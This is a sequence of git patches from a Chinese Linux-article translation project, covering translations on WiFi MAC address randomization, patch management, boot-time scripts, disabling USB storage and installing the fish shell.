(你必须在随机和稳定这两个选项之中选择一个,但没有一天之内保持不变这一选项) + + + 因为我使用的是Ubuntu 16.04,网络管理器版本为1.2,不能直接使用高版本这一新功能。可能网络管理器有一些随机化方法支持,但我没能成功。所以我编了一个脚本来实现这一目标。 + + + 幸运的是,网络管理器1.2 允许生成随机MAC地址。你在已连接的网络中可以看见 ‘编辑连接’这一选项: + + + ![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) + + 网络管理器也支持消息处理 - 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 + + + ### 分配随机生成的伪MAC地址 + + 我想根据网络ID和日期来生成新的随机MAC地址。 我们可以使用网络管理器的命令行工具,nmcli,来显示所有可用网络: + + + ``` + > nmcli connection + NAME UUID TYPE DEVICE + Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 + DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- + PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- + virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- + + ``` + + 因为每个网络都有一个唯一标识符,为了实现我的计划,我将UUID和日期拼接在一起,然后使用MD5生成hash值: + + ``` + + # eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 + + > echo -n "${UUID}-$(date +%F)" | md5sum + + 53594de990e92f9b914a723208f22b3f - + + ``` + 生成的结果可以代替MAC地址的最后八个字节。 + + + 值得注意的是,最开始的字节 `02` 代表这个地址是自行指定的。实际上,真实MAC地址的前三个字节是由制造商决定的,例如 `b4:b6:76` 就代表Intel。 + + + 有可能某些路由器会拒绝自己指定的MAC地址,但是我还没有遇到过这种情况。 + + + 每次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: + + + ![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) + + 最后,我查看了 `ifconfig`的输出结果,我发现端口MAC地址已经变成了随机生成的地址,而不是我真实的MAC地址。 + + + ``` + > ifconfig + wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d + inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 + inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 + TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) + + ``` + 完整的脚本可以在Github上查看。 + + + ``` + #!/bin/sh + + # /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses + + # Configure every saved WiFi connection in NetworkManager with a spoofed MAC + # address, seeded from the UUID of the connection and the date eg: + # 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' + + # This makes your MAC impossible(?) to track across WiFi providers, and + # for one provider to track across days. + + # For craptive portals that authenticate based on MAC, you might want to + # automate logging in :) + + # Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar + # automatically. + + export PATH=$PATH:/usr/bin:/bin + + LOG_FILE=/var/log/randomize-mac-addresses + + echo "$(date): $*" > ${LOG_FILE} + + WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) + + for UUID in ${WIFI_UUIDS} + do + UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) + + RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" + + CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" + + echo "$CMD" >> ${LOG_FILE} + $CMD & + done + + wait + ``` + + + + _更新:使用自己指定的MAC地址可以避免和真正的intel地址冲突。感谢 [@_fink][6]_ + + --------------------------------------------------------------------------------- + + -via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ + + 作者:[Paul M Furley ][a] + 译者:[译者ID](https://github.com/译者ID) + 校对:[校对者ID](https://github.com/校对者ID) + + 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + + [a]:https://www.paulfurley.com/ + [1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses + [2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses + [3]:https://github.com/ + [4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ + [5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef + [6]:https://twitter.com/fink_/status/937305600005943296 + [7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ + [8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local + [9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f From a29132873f48bd4e04b3260b6191521af00835fe Mon Sep 17 00:00:00 2001 From: xu0o0 Date: Sun, 10 Dec 2017 01:36:58 +0800 Subject: [PATCH 0466/1627] translated by @haoqixu --- .../20171114 Sysadmin 101 Patch Management.md | 61 ------------------- .../20171114 Sysadmin 101 Patch Management.md | 54 ++++++++++++++++ 2 files changed, 54 insertions(+), 61 deletions(-) delete mode 100644 sources/tech/20171114 Sysadmin 101 Patch Management.md create mode 100644 translated/tech/20171114 Sysadmin 101 Patch Management.md diff --git a/sources/tech/20171114 Sysadmin 101 Patch Management.md b/sources/tech/20171114 Sysadmin 101 Patch Management.md deleted file mode 100644 index 55ca09da87..0000000000 --- a/sources/tech/20171114 Sysadmin 101 Patch Management.md +++ /dev/null @@ -1,61 +0,0 @@ -【翻译中 @haoqixu】Sysadmin 101: Patch Management -============================================================ - -* [HOW-TOs][1] - -* [Servers][2] - -* [SysAdmin][3] - - -A few articles ago, I started a Sysadmin 101 series to pass down some fundamental knowledge about systems administration that the current generation of junior sysadmins, DevOps engineers or "full stack" developers might not learn otherwise. I had thought that I was done with the series, but then the WannaCry malware came out and exposed some of the poor patch management practices still in place in Windows networks. I imagine some readers that are still stuck in the Linux versus Windows wars of the 2000s might have even smiled with a sense of superiority when they heard about this outbreak. - -The reason I decided to revive my Sysadmin 101 series so soon is I realized that most Linux system administrators are no different from Windows sysadmins when it comes to patch management. Honestly, in some areas (in particular, uptime pride), some Linux sysadmins are even worse than Windows sysadmins regarding patch management. So in this article, I cover some of the fundamentals of patch management under Linux, including what a good patch management system looks like, the tools you will want to put in place and how the overall patching process should work. - -### What Is Patch Management? - -When I say patch management, I'm referring to the systems you have in place to update software already on a server. I'm not just talking about keeping up with the latest-and-greatest bleeding-edge version of a piece of software. Even more conservative distributions like Debian that stick with a particular version of software for its "stable" release still release frequent updates that patch bugs or security holes. - -Of course, if your organization decided to roll its own version of a particular piece of software, either because developers demanded the latest and greatest, you needed to fork the software to apply a custom change, or you just like giving yourself extra work, you now have a problem. Ideally you have put in a system that automatically packages up the custom version of the software for you in the same continuous integration system you use to build and package any other software, but many sysadmins still rely on the outdated method of packaging the software on their local machine based on (hopefully up to date) documentation on their wiki. In either case, you will need to confirm that your particular version has the security flaw, and if so, make sure that the new patch applies cleanly to your custom version. - -### What Good Patch Management Looks Like - -Patch management starts with knowing that there is a software update to begin with. First, for your core software, you should be subscribed to your Linux distribution's security mailing list, so you're notified immediately when there are security patches. If there you use any software that doesn't come from your distribution, you must find out how to be kept up to date on security patches for that software as well. When new security notifications come in, you should review the details so you understand how severe the security flaw is, whether you are affected and gauge a sense of how urgent the patch is. - -Some organizations have a purely manual patch management system. With such a system, when a security patch comes along, the sysadmin figures out which servers are running the software, generally by relying on memory and by logging in to servers and checking. Then the sysadmin uses the server's built-in package management tool to update the software with the latest from the distribution. Then the sysadmin moves on to the next server, and the next, until all of the servers are patched. - -There are many problems with manual patch management. First is the fact that it makes patching a laborious chore. The more work patching is, the more likely a sysadmin will put it off or skip doing it entirely. The second problem is that manual patch management relies too much on the sysadmin's ability to remember and recall all of the servers he or she is responsible for and keep track of which are patched and which aren't. This makes it easy for servers to be forgotten and sit unpatched. - -The faster and easier patch management is, the more likely you are to do it. You should have a system in place that quickly can tell you which servers are running a particular piece of software at which version. Ideally, that system also can push out updates. Personally, I prefer orchestration tools like MCollective for this task, but Red Hat provides Satellite, and Canonical provides Landscape as central tools that let you view software versions across your fleet of servers and apply patches all from a central place. - -Patching should be fault-tolerant as well. You should be able to patch a service and restart it without any overall down time. The same idea goes for kernel patches that require a reboot. My approach is to divide my servers into different high availability groups so that lb1, app1, rabbitmq1 and db1 would all be in one group, and lb2, app2, rabbitmq2 and db2 are in another. Then, I know I can patch one group at a time without it causing downtime anywhere else. - -So, how fast is fast? Your system should be able to roll out a patch to a minor piece of software that doesn't have an accompanying service (such as bash in the case of the ShellShock vulnerability) within a few minutes to an hour at most. For something like OpenSSL that requires you to restart services, the careful process of patching and restarting services in a fault-tolerant way probably will take more time, but this is where orchestration tools come in handy. I gave examples of how to use MCollective to accomplish this in my recent MCollective articles (see the December 2016 and January 2017 issues), but ideally, you should put a system in place that makes it easy to patch and restart services in a fault-tolerant and automated way. - -When patching requires a reboot, such as in the case of kernel patches, it might take a bit more time, but again, automation and orchestration tools can make this go much faster than you might imagine. I can patch and reboot the servers in an environment in a fault-tolerant way within an hour or two, and it would be much faster than that if I didn't need to wait for clusters to sync back up in between reboots. - -Unfortunately, many sysadmins still hold on to the outdated notion that uptime is a badge of pride—given that serious kernel patches tend to come out at least once a year if not more often, to me, it's proof you don't take security seriously. - -Many organizations also still have that single point of failure server that can never go down, and as a result, it never gets patched or rebooted. If you want to be secure, you need to remove these outdated liabilities and create systems that at least can be rebooted during a late-night maintenance window. - -Ultimately, fast and easy patch management is a sign of a mature and professional sysadmin team. Updating software is something all sysadmins have to do as part of their jobs, and investing time into systems that make that process easy and fast pays dividends far beyond security. For one, it helps identify bad architecture decisions that cause single points of failure. For another, it helps identify stagnant, out-of-date legacy systems in an environment and provides you with an incentive to replace them. Finally, when patching is managed well, it frees up sysadmins' time and turns their attention to the things that truly require their expertise. - -______________________ - -Kyle Rankin is senior security and infrastructure architect, the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu Server Book, and a columnist for Linux Journal. Follow him @kylerankin - --------------------------------------------------------------------------------- - -via: https://www.linuxjournal.com/content/sysadmin-101-patch-management - -作者:[Kyle Rankin ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/kyle-rankin -[1]:https://www.linuxjournal.com/tag/how-tos -[2]:https://www.linuxjournal.com/tag/servers -[3]:https://www.linuxjournal.com/tag/sysadmin -[4]:https://www.linuxjournal.com/users/kyle-rankin diff --git a/translated/tech/20171114 Sysadmin 101 Patch Management.md b/translated/tech/20171114 Sysadmin 101 Patch Management.md new file mode 100644 index 0000000000..4a7a223ccf --- /dev/null +++ b/translated/tech/20171114 Sysadmin 101 Patch Management.md @@ -0,0 +1,54 @@ +系统管理 101:补丁管理 +============================================================ + +就在之前几篇文章,我开始了“系统管理 101”系列文章,用来记录现今许多初级系统管理员,DevOps 工程师或者“全栈”开发者可能不曾接触过的一些系统管理方面的基本知识。按照我原本的设想,该系列文章已经是完结了的。然而后来 WannaCry 恶意软件出现并在补丁管理不善的 Windows 主机网络间爆发。我能想象到那些仍然深陷 2000 年代 Linux 与 Windows 争论的读者听到这个消息可能已经面露优越的微笑。 + +我之所以这么快就决定再次继续“系统管理 101”文章系列,是因为我意识到在补丁管理方面一些 Linux 系统管理员和 Windows 系统管理员没有差别。实话说,在一些方面甚至做的更差(特别是以运行时间为豪)。所以,这篇文章会涉及 Linux 下补丁管理的基础概念,包括良好的补丁管理该是怎样的,你可能会用到的一些相关工具,以及整个补丁安装过程是如何进行的。 + +### 什么是补丁管理? + +我所说的补丁管理,是指你部署用于升级服务器上软件的系统,不仅仅是把软件更新到最新最好的前沿版本。即使是像 Debian 这样为了“稳定性”持续保持某一特定版本软件的保守派发行版,也会时常发布升级补丁用于修补错误和安全漏洞。 + +当然,因为开发者对最新最好版本的需求,你需要派生软件源码并做出修改,或者因为你喜欢给自己额外的工作量,你的组织可能会决定自己维护特定软件的版本,这时你就会遇到问题。理想情况下,你应该已经配置好你的系统,让它在自动构建和打包定制版本软件时使用其它软件所用的同一套持续集成系统。然而,许多系统管理员仍旧在自己的本地主机上按照维基上的文档(但愿是最新的文档)使用过时的方法打包软件。不论使用哪种方法,你都需要明确你所使用的版本有没有安全缺陷,如果有,那必须确保新补丁安装到你定制版本的软件上了。 + +### 良好的补丁管理是怎样的 + +补丁管理首先要做的是检查软件的升级。首先,对于核心软件,你应该订阅相应 Linux 发行版的安全邮件列表,这样才能第一时间得知软件的安全升级情况。如果你使用的软件有些不是来自发行版的仓库,那么你也必须设法跟踪它们的安全更新。一旦接收到新的安全通知,你必须查阅通知细节,以此明确安全漏洞的严重程度,确定你的系统是否受影响,以及安全补丁的紧急性。 + +一些组织仍在使用手动方式管理补丁。在这种方式下,当出现一个安全补丁,系统管理员就要凭借记忆,登录到各个服务器上进行检查。在确定了哪些服务器需要升级后,再使用服务器内建的包管理工具从发行版仓库升级这些软件。最后以相同的方式升级剩余的所有服务器。 + +手动管理补丁的方式存在很多问题。首先,这么做会使补丁安装成为一个苦力活,安装补丁需要越多人力成本,系统管理员就越可能推迟甚至完全忽略它。其次,手动管理方式依赖系统管理员凭借记忆去跟踪他或她所负责的服务器的升级情况。这非常容易导致有些服务器被遗漏而未能及时升级。 + +补丁管理越快速简便,你就越可能把它做好。你应该构建一个系统,用来快速查询哪些服务器运行着特定的软件,以及这些软件的版本号,而且它最好还能够推送各种升级补丁。就个人而言,我倾向于使用 MCollective 这样的编排工具来完成这个任务,但是红帽提供的 Satellite 以及 Canonical 提供的 Landscape 也可以让你在统一的管理接口查看服务器上软件的版本信息,并且安装补丁。 + +补丁安装还应该具有容错能力。你应该具备在不下线的情况下为服务安装补丁的能力。这同样适用于需要重启系统的内核补丁。我采用的方法是把我的服务器划分为不同的高可用组,lb1,app1,rabbitmq1 和 db1 在一个组,而lb2,app2,rabbitmq2 和 db2 在另一个组。这样,我就能一次升级一个组,而无须下线服务。 + +所以,多快才能算快呢?对于少数没有附带服务的软件,你的系统最快应该能够在几分钟到一小时内安装好补丁(例如 bash 的 ShellShock 漏洞)。对于像 OpenSSL 这样需要重启服务的软件,以容错的方式安装补丁并重启服务的过程可能会花费稍多的时间,但这就是编排工具派上用场的时候。我在最近的关于 MCollective 的文章中(查看 2016 年 12 月和 2017 年 1 月的工单)给了几个使用 MCollective 实现补丁管理的例子。你最好能够部署一个系统,以具备容错性的自动化方式简化补丁安装和服务重启的过程。 + +如果补丁要求重启系统,像内核补丁,那它会花费更多的时间。再次强调,自动化和编排工具能够让这个过程比你想象的还要快。我能够在一到两个小时内在生产环境中以容错方式升级并重启服务器,如果重启之间无须等待集群同步备份,这个过程还能更快。 + +不幸的是,许多系统管理员仍坚信过时的观点,把运行时间作为一种骄傲的象征——鉴于紧急内核补丁大约每年一次。对于我来说,这只能说明你没有认真对待系统的安全性。 + +很多组织仍然使用无法暂时下线的单点故障的服务器,也因为这个原因,它无法升级或者重启。如果你想让系统更加安全,你需要去除过时的包袱,搭建一个至少能在深夜维护时段重启的系统。 + +基本上,快速便捷的补丁管理也是一个成熟专业的系统管理团队所具备的标志。升级软件是所有系统管理员的必要工作之一,花费时间去让这个过程简洁快速,带来的好处远远不止是系统安全性。例如,它能帮助我们找到架构设计中的单点故障。另外,它还帮助鉴定出环境中过时的系统,给我们替换这些部分提供了动机。最后,当补丁管理做得足够好,它会节省系统管理员的时间,让他们把精力放在真正需要专业知识的地方。 + +______________________ + +Kyle Rankin 是高级安全与基础设施架构师,其著作包括: Linux Hardening in Hostile Networks,DevOps Troubleshooting 以及 The Official Ubuntu Server Book。同时,他还是 Linux Journal 的专栏作家。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/sysadmin-101-patch-management + +作者:[Kyle Rankin ][a] +译者:[haoqixu](https://github.com/haoqixu) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/kyle-rankin +[1]:https://www.linuxjournal.com/tag/how-tos +[2]:https://www.linuxjournal.com/tag/servers +[3]:https://www.linuxjournal.com/tag/sysadmin +[4]:https://www.linuxjournal.com/users/kyle-rankin From cbdd4be84fb97b3d35f6d21b9bfbd8b4c339f0ec Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 10 Dec 2017 09:15:42 +0800 Subject: [PATCH 0467/1627] PRF&PUB:20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md @lujun9972 https://linux.cn/article-9123-1.html --- ...nd Scripts at Reboot & Startup in Linux.md | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) rename {translated/tech => published}/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md (77%) diff --git a/translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md b/published/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md similarity index 77% rename from translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md rename to published/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md index 107caa6bd9..cc308d7554 100644 --- a/translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md +++ b/published/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md @@ -1,39 +1,39 @@ 在 Linux 启动或重启时执行命令与脚本 ====== + 有时可能会需要在重启时或者每次系统启动时运行某些命令或者脚本。我们要怎样做呢?本文中我们就对此进行讨论。 我们会用两种方法来描述如何在 CentOS/RHEL 以及 Ubuntu 系统上做到重启或者系统启动时执行命令和脚本。 两种方法都通过了测试。 ### 方法 1 – 使用 rc.local -这种方法会利用 `/etc/` 中的 `rc.local` 文件来在启动时执行脚本与命令。我们在文件中加上一行 l 爱执行脚本,这样每次启动系统时,都会执行该脚本。 +这种方法会利用 `/etc/` 中的 `rc.local` 文件来在启动时执行脚本与命令。我们在文件中加上一行来执行脚本,这样每次启动系统时,都会执行该脚本。 不过我们首先需要为 `/etc/rc.local` 添加执行权限, -```shell +``` $ sudo chmod +x /etc/rc.local ``` -然后将要执行的脚本加入其中, +然后将要执行的脚本加入其中: -```shell +``` $ sudo vi /etc/rc.local ``` -在文件最后加上 +在文件最后加上: -```shell +``` sh /root/script.sh & ``` -然后保存文件并退出。 -使用 `rc.local` 文件来执行命令也是一样的,但是一定要记得填写命令的完整路径。 像知道命令的完整路径可以运行 +然后保存文件并退出。使用 `rc.local` 文件来执行命令也是一样的,但是一定要记得填写命令的完整路径。 想知道命令的完整路径可以运行: -```shell +``` $ which command ``` -比如, +比如: -```shell +``` $ which shutter /usr/bin/shutter ``` @@ -48,13 +48,13 @@ $ which shutter 要创建 cron 任务,打开终端并执行 -```shell +``` $ crontab -e ``` 然后输入下行内容, -```shell +``` @reboot ( sleep 90 ; sh \location\script.sh ) ``` @@ -68,7 +68,7 @@ via: http://linuxtechlab.com/executing-commands-scripts-at-reboot/ 作者:[Shusain][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From bac419840e68132378d4d826355c153be0bfdb8b Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 10 Dec 2017 09:30:10 +0800 Subject: [PATCH 0468/1627] PRF&PUB:20170922 How to disable USB storage on Linux.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 延迟发布 --- ...922 How to disable USB storage on Linux.md | 33 ++++++++++--------- 1 file changed, 17 insertions(+), 16 deletions(-) rename {translated/tech => published}/20170922 How to disable USB storage on Linux.md (68%) diff --git a/translated/tech/20170922 How to disable USB storage on Linux.md b/published/20170922 How to disable USB storage on Linux.md similarity index 68% rename from translated/tech/20170922 How to disable USB storage on Linux.md rename to published/20170922 How to disable USB storage on Linux.md index 04a8b607b4..f89e11f691 100644 --- a/translated/tech/20170922 How to disable USB storage on Linux.md +++ b/published/20170922 How to disable USB storage on Linux.md @@ -1,46 +1,47 @@ Linux 上如何禁用 USB 存储 ====== + 为了保护数据不被泄漏,我们使用软件和硬件防火墙来限制外部未经授权的访问,但是数据泄露也可能发生在内部。 为了消除这种可能性,机构会限制和监测访问互联网,同时禁用 USB 存储设备。 在本教程中,我们将讨论三种不同的方法来禁用 Linux 机器上的 USB 存储设备。所有这三种方法都在 CentOS 6&7 机器上通过测试。那么让我们一一讨论这三种方法, -( 另请阅读: [Ultimate guide to securing SSH sessions][1] ) +(另请阅读: [Ultimate guide to securing SSH sessions][1]) ### 方法 1 – 伪安装 -在本方法中,我们往配置文件中添加一行 `install usb-storage /bin/true`, 这会让安装 usb-storage 模块的操作实际上变成运行 `/bin/true`, 这也是为什么这种方法叫做`伪安装`的原因。 具体来说就是, 在文件夹 `/etc/modprobe.d` 中创建并打开一个名为 `block_usb.conf` (也可能教其他名字) , +在本方法中,我们往配置文件中添加一行 `install usb-storage /bin/true`, 这会让安装 usb-storage 模块的操作实际上变成运行 `/bin/true`, 这也是为什么这种方法叫做`伪安装`的原因。 具体来说就是,在文件夹 `/etc/modprobe.d` 中创建并打开一个名为 `block_usb.conf` (也可能叫其他名字) , -```shell +``` $ sudo vim /etc/modprobe.d/block_usb.conf ``` -然后将下行内容添加进去, +然后将下行内容添加进去: -```shell +``` install usb-storage /bin/true ``` 最后保存文件并退出。 -### 方法 2 – 删除 UBS 驱动 +### 方法 2 – 删除 USB 驱动 -这种方法要求我们将 usb 存储的驱动程序(usb_storage.ko)删掉或者移走,从而达到无法再访问 usb 存储设备的目的。 执行下面命令可以将驱动从它默认的位置移走, execute the following command, +这种方法要求我们将 USB 存储的驱动程序(`usb_storage.ko`)删掉或者移走,从而达到无法再访问 USB 存储设备的目的。 执行下面命令可以将驱动从它默认的位置移走: -```shell +``` $ sudo mv /lib/modules/$(uname -r)/kernel/drivers/usb/storage/usb-storage.ko /home/user1 ``` -现在在默认的位置上无法再找到驱动程序了,因此当 USB 存储器连接道系统上时也就无法加载到驱动程序了,从而导致磁盘不可用。 但是这个方法有一个小问题,那就是当系统内核更新的时候,usb-storage 模块会再次出现在它的默认位置。 +现在在默认的位置上无法再找到驱动程序了,因此当 USB 存储器连接到系统上时也就无法加载到驱动程序了,从而导致磁盘不可用。 但是这个方法有一个小问题,那就是当系统内核更新的时候,`usb-storage` 模块会再次出现在它的默认位置。 -### 方法 3- 将 USB-storage 纳入黑名单 +### 方法 3 - 将 USB 存储器纳入黑名单 -我们也可以通过 `/etc/modprobe.d/blacklist.conf` 文件将 usb-storage 纳入黑名单。这个文件在 RHEL/CentOS 6 是现成就有的,但在 7 上可能需要自己创建。 要将 usb 存储列入黑名单,请使用 vim 打开/创建上述文件, +我们也可以通过 `/etc/modprobe.d/blacklist.conf` 文件将 usb-storage 纳入黑名单。这个文件在 RHEL/CentOS 6 是现成就有的,但在 7 上可能需要自己创建。 要将 USB 存储列入黑名单,请使用 vim 打开/创建上述文件: -```shell +``` $ sudo vim /etc/modprobe.d/blacklist.conf ``` -并输入以下行将 USB 纳入黑名单, +并输入以下行将 USB 纳入黑名单: ``` blacklist usb-storage @@ -48,13 +49,13 @@ blacklist usb-storage 保存文件并退出。`usb-storage` 就在就会被系统阻止加载,但这种方法有一个很大的缺点,即任何特权用户都可以通过执行以下命令来加载 `usb-storage` 模块, -```shell +``` $ sudo modprobe usb-storage ``` 这个问题使得这个方法不是那么理想,但是对于非特权用户来说,这个方法效果很好。 -在更改完成后重新启动系统,以使更改生效。请尝试用这些方法来禁用 USB 存储,如果您遇到任何问题或有什么问题,请告知我们。 +在更改完成后重新启动系统,以使更改生效。请尝试用这些方法来禁用 USB 存储,如果您遇到任何问题或有什么疑问,请告知我们。 -------------------------------------------------------------------------------- @@ -63,7 +64,7 @@ via: http://linuxtechlab.com/disable-usb-storage-linux/ 作者:[Shusain][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject)原创编译,[Linux 中国](https://linux.cn/)荣誉推出 From 78a7de4a99fbaded456781719ebe27b7d36ca5cf Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 10 Dec 2017 09:56:12 +0800 Subject: [PATCH 0469/1627] PRF&PUB:20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md @kimii https://linux.cn/article-9125-1.html --- ...he Friendly Interactive Shell, In Linux.md | 116 ++++-------------- 1 file changed, 26 insertions(+), 90 deletions(-) rename {translated/tech => published}/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md (64%) diff --git a/translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md b/published/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md similarity index 64% rename from translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md rename to published/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md index e519106806..01a6fad444 100644 --- a/translated/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md +++ b/published/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md @@ -1,12 +1,13 @@ -如何在 Linux 上安装友好的交互式 shell,Fish +如何在 Linux 上安装友好的交互式 shell:Fish ====== -Fish,友好的交互式 shell 的缩写,它是一个适用于类 Unix 系统的装备良好,智能而且用户友好的 shell。Fish 有着很多重要的功能,比如自动建议,语法高亮,可搜索的历史记录(像在 bash 中 CTRL+r),智能搜索功能,极好的 VGA 颜色支持,基本的 web 设置,完善的手册页和许多开箱即用的功能。尽管安装并立即使用它吧。无需更多其他配置,你也不需要安装任何额外的附加组件/插件! -在这篇教程中,我们讨论如何在 linux 中安装和使用 fish shell。 +Fish,友好的交互式 shellFriendly Interactive SHell 的缩写,它是一个适于装备于类 Unix 系统的智能而用户友好的 shell。Fish 有着很多重要的功能,比如自动建议、语法高亮、可搜索的历史记录(像在 bash 中 `CTRL+r`)、智能搜索功能、极好的 VGA 颜色支持、基于 web 的设置方式、完善的手册页和许多开箱即用的功能。尽管安装并立即使用它吧。无需更多其他配置,你也不需要安装任何额外的附加组件/插件! + +在这篇教程中,我们讨论如何在 Linux 中安装和使用 fish shell。 #### 安装 Fish -尽管 fish 是一个非常用户友好的并且功能丰富的 shell,但在大多数 Linux 发行版的默认仓库中它并没有被包括。它只能在少数 Linux 发行版中的官方仓库中找到,如 Arch Linux,Gentoo,NixOS,和 Ubuntu 等。然而,安装 fish 并不难。 +尽管 fish 是一个非常用户友好的并且功能丰富的 shell,但并没有包括在大多数 Linux 发行版的默认仓库中。它只能在少数 Linux 发行版中的官方仓库中找到,如 Arch Linux,Gentoo,NixOS,和 Ubuntu 等。然而,安装 fish 并不难。 在 Arch Linux 和它的衍生版上,运行以下命令来安装它。 @@ -18,13 +19,7 @@ sudo pacman -S fish ``` cd /etc/yum.repos.d/ -``` - -``` wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_7/shells:fish:release:2.repo -``` - -``` yum install fish ``` @@ -32,13 +27,7 @@ yum install fish ``` cd /etc/yum.repos.d/ -``` - -``` wget https://download.opensuse.org/repositories/shells:fish:release:2/CentOS_6/shells:fish:release:2.repo -``` - -``` yum install fish ``` @@ -46,21 +35,9 @@ yum install fish ``` wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_9.0/Release.key -O Release.key -``` - -``` apt-key add - < Release.key -``` - -``` echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_9.0/ /' > /etc/apt/sources.list.d/fish.list -``` - -``` apt-get update -``` - -``` apt-get install fish ``` @@ -68,21 +45,9 @@ apt-get install fish ``` wget -nv https://download.opensuse.org/repositories/shells:fish:release:2/Debian_8.0/Release.key -O Release.key -``` - -``` apt-key add - < Release.key -``` - -``` echo 'deb http://download.opensuse.org/repositories/shells:/fish:/release:/2/Debian_8.0/ /' > /etc/apt/sources.list.d/fish.list -``` - -``` apt-get update -``` - -``` apt-get install fish ``` @@ -90,9 +55,6 @@ apt-get install fish ``` dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_26/shells:fish:release:2.repo -``` - -``` dnf install fish ``` @@ -100,9 +62,6 @@ dnf install fish ``` dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_25/shells:fish:release:2.repo -``` - -``` dnf install fish ``` @@ -110,9 +69,6 @@ dnf install fish ``` dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_24/shells:fish:release:2.repo -``` - -``` dnf install fish ``` @@ -120,9 +76,6 @@ dnf install fish ``` dnf config-manager --add-repo https://download.opensuse.org/repositories/shells:fish:release:2/Fedora_23/shells:fish:release:2.repo -``` - -``` dnf install fish ``` @@ -136,13 +89,7 @@ 